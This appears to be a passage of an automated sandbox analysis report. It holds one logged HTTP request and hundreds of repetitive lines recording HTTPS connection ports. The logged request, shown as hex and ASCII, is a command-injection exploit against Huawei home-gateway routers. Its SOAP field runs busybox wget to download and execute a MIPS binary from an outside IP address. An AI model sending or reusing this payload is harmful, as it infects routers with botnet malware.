    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 33 36 2e 34 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 54 73 75 6e 61 6d 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 54 73 75 6e 61 6d 69 2e 48 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.136.43.52 -l /tmp/binary -r /bins/Tsunami.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary Tsunami.Huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: unknownNetwork traffic detected: HTTP traffic on port 47716 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 46746 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 42028 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47562
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38612
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 35586
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 35582
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60538
    Source: unknownNetwork traffic detected: HTTP traffic on port 37914 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60536
    Source: unknownNetwork traffic detected: HTTP traffic on port 35446 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 33036 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58226
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 33388
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 37754
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 34242
    Source: unknownNetwork traffic detected: HTTP traffic on port 60266 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 54802 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 48876
    Source: unknownNetwork traffic detected: HTTP traffic on port 57416 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 58226 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 41746 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 45764 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59568
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 34234
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58244
    Source: unknownNetwork traffic detected: HTTP traffic on port 57096 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59572
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58242
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57392
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 48866
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 44028
    Source: unknownNetwork traffic detected: HTTP traffic on port 46804 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 40662 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 54126 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 33838 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 60278 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57186 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 45350
    Source: unknownNetwork traffic detected: HTTP traffic on port 57232 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50764
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39910
    Source: unknownNetwork traffic detected: HTTP traffic on port 55522 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 37754 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 51320 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 33372
    Source: unknownNetwork traffic detected: HTTP traffic on port 38748 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 45306 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 43168
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 48856
    Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 59290 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 54102 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
    Source: unknownNetwork traffic detected: HTTP traffic on port 37844 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57328
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58658
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39986
    Source: unknownNetwork traffic detected: HTTP traffic on port 41022 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58664
    Source: unknownNetwork traffic detected: HTTP traffic on port 54228 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49426 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 60230 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47116
    Source: unknownNetwork traffic detected: HTTP traffic on port 58030 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 60312 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50656 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 39398 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 35196 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 46260
    Source: unknownNetwork traffic detected: HTTP traffic on port 50522 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38640
    Source: unknownNetwork traffic detected: HTTP traffic on port 36920 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 51626 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
    Source: unknownNetwork traffic detected: HTTP traffic on port 60852 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 46252
    Source: unknownNetwork traffic detected: HTTP traffic on port 44242 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47100
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 46250
    Source: unknownNetwork traffic detected: HTTP traffic on port 52830 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40942
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56020
    Source: unknownNetwork traffic detected: HTTP traffic on port 46644 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 41722 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 34270
    Source: unknownNetwork traffic detected: HTTP traffic on port 39386 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 46248
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 44064
    Source: unknownNetwork traffic detected: HTTP traffic on port 52346 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39952
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 37774
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56028
    Source: unknownNetwork traffic detected: HTTP traffic on port 40878 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 35114
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 35598
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 35596
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55180
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52908
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 48418
    Source: unknownNetwork traffic detected: HTTP traffic on port 50644 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 40216 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51668
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38690
    Source: unknownNetwork traffic detected: HTTP traffic on port 47462 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 48494
    Source: unknownNetwork traffic detected: HTTP traffic on port 34330 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53840
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36032
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38212
    Source: unknownNetwork traffic detected: HTTP traffic on port 41828 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47160
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36036
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36038
    Source: unknownNetwork traffic detected: HTTP traffic on port 57694 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50348
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47156
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 48486
    Source: unknownNetwork traffic detected: HTTP traffic on port 40830 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 53148 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59168
    Source: unknownNetwork traffic detected: HTTP traffic on port 48346 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59164
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47148
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54716
    Source: unknownNetwork traffic detected: HTTP traffic on port 38360 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49320
    Source: unknownNetwork traffic detected: HTTP traffic on port 45268 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52534
    Source: unknownNetwork traffic detected: HTTP traffic on port 57252 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 33204 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 38768 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56908
    Source: unknownNetwork traffic detected: HTTP traffic on port 36174 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51216
    Source: unknownNetwork traffic detected: HTTP traffic on port 53840 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 53590 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 53710 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56900
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51212
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54722
    Source: unknownNetwork traffic detected: HTTP traffic on port 44872 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41828
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60162
    Source: unknownNetwork traffic detected: HTTP traffic on port 57150 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40972
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 48458
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51626
    Source: unknownNetwork traffic detected: HTTP traffic on port 45560 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 42548 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38250
    Source: unknownNetwork traffic detected: HTTP traffic on port 43350 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 32940
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50774
    Source: unknownNetwork traffic detected: HTTP traffic on port 46816 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59116
    Source: unknownNetwork traffic detected: HTTP traffic on port 60324 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41896
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59592
    Source: unknownNetwork traffic detected: HTTP traffic on port 47486 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 48932 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41894
    Source: unknownNetwork traffic detected: HTTP traffic on port 48628 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 48048
    Source: unknownNetwork traffic detected: HTTP traffic on port 54392 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38240
    Source: unknownNetwork traffic detected: HTTP traffic on port 46002 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57882 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60580
    Source: unknownNetwork traffic detected: HTTP traffic on port 56090 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 45900 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56090
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50316
    Source: unknownNetwork traffic detected: HTTP traffic on port 37852 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39560
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 48032
    Source: unknownNetwork traffic detected: HTTP traffic on port 55722 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39566
    Source: unknownNetwork traffic detected: HTTP traffic on port 40236 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58280
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58282
    Source: unknownNetwork traffic detected: HTTP traffic on port 48288 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 41632 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53836
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49356
    Source: unknownNetwork traffic detected: HTTP traffic on port 55452 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 55882 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53838
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38220
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39554
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53830
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60124
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40536
    Source: unknownNetwork traffic detected: HTTP traffic on port 45630 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 35196
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40530
    Source: unknownNetwork traffic detected: HTTP traffic on port 44582 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 34808 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 46570 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 59592 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50298
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53320
    Source: unknownNetwork traffic detected: HTTP traffic on port 42618 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 42904 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 33110 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55518
    Source: unknownNetwork traffic detected: HTTP traffic on port 52432 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 39952 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53332
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 32854
    Source: unknownNetwork traffic detected: HTTP traffic on port 52306 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 43508
    Source: unknownNetwork traffic detected: HTTP traffic on port 50812 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 42656
    Source: unknownNetwork traffic detected: HTTP traffic on port 35934 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57628 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55522
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40468
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 37292
    Source: unknownNetwork traffic detected: HTTP traffic on port 38250 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 55836 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47094
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49270
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55532
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54204
    Source: unknownNetwork traffic detected: HTTP traffic on port 38318 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 37542 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 42636
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53362
    Source: unknownNetwork traffic detected: HTTP traffic on port 53002 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 43560
    Source: unknownNetwork traffic detected: HTTP traffic on port 50424 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 54532 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52432
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 35934
    Source: unknownNetwork traffic detected: HTTP traffic on port 47160 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 52846 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 44606 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 47094 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 60536 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 52534 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 37222 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59074
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 44400
    Source: unknownNetwork traffic detected: HTTP traffic on port 58196 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 58542 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 53836 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56806
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60072
    Source: unknownNetwork traffic detected: HTTP traffic on port 37104 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 54466 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 44872
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39044
    Source: unknownNetwork traffic detected: HTTP traffic on port 51132 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51124
    Source: unknownNetwork traffic detected: HTTP traffic on port 60922 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60078
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 32890
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60076
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 42688
    Source: unknownNetwork traffic detected: HTTP traffic on port 33372 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 41420 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 54130 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 35904
    Source: unknownNetwork traffic detected: HTTP traffic on port 33834 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60092
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51132
    Source: unknownNetwork traffic detected: HTTP traffic on port 49356 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 32872
    Source: unknownNetwork traffic detected: HTTP traffic on port 54416 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 48912 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 43524
    Source: unknownNetwork traffic detected: HTTP traffic on port 47892 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 43520
    Source: unknownNetwork traffic detected: HTTP traffic on port 54748 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 58738 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 34404 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60938
    Source: unknownNetwork traffic detected: HTTP traffic on port 37418 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52078
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 33796
    Source: unknownNetwork traffic detected: HTTP traffic on port 39554 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 60938 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60936
    Source: unknownNetwork traffic detected: HTTP traffic on port 56294 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 48936 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 48060 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39098
    Source: unknownNetwork traffic detected: HTTP traffic on port 51540 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 33300
    Source: unknownNetwork traffic detected: HTTP traffic on port 53292 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 33794
    Source: unknownNetwork traffic detected: HTTP traffic on port 36522 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 45764
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 43584
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40074
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 34628
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57308
    Source: unknownNetwork traffic detected: HTTP traffic on port 60332 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 44332 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 38428 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 37406 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 56728 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50586 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 58280 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 46608
    Source: unknownNetwork traffic detected: HTTP traffic on port 49688 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 37522 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 39136 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 38114 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 54134 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 39566 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54288
    Source: unknownNetwork traffic detected: HTTP traffic on port 48072 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 35008 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59984
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58650
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 42236
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 45748
    Source: unknownNetwork traffic detected: HTTP traffic on port 52166 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 35684 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 45746
    Source: unknownNetwork traffic detected: HTTP traffic on port 51402 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47920
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 44494
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47520
    Source: unknownNetwork traffic detected: HTTP traffic on port 55038 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53366
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56878
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 35542
    Source: unknownNetwork traffic detected: HTTP traffic on port 42368 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 44488
    Source: unknownNetwork traffic detected: HTTP traffic on port 53112 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 43156
    Source: unknownNetwork traffic detected: HTTP traffic on port 60622 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 56028 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54228
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57734
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55556
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53380
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 37702
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56894
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 34682
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 33352
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53382
    Source: unknownNetwork traffic detected: HTTP traffic on port 48084 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 46654
    Source: unknownNetwork traffic detected: HTTP traffic on port 58992 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 45646 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 38008 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 39112 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 47470 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 53994 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 40208 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 53144 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57750
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 43134
    Source: unknownNetwork traffic detected: HTTP traffic on port 48190 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 46644
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 43132
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 35508
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57758
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 33324
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58600
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56424
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54248
    Source: unknownNetwork traffic detected: HTTP traffic on port 35114 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 59572 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 45306
    Source: unknownNetwork traffic detected: HTTP traffic on port 49320 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60922
    Source: unknownNetwork traffic detected: HTTP traffic on port 47762 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 54716 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 59886 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 58176 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 44456
    Source: unknownNetwork traffic detected: HTTP traffic on port 43216 -> 443
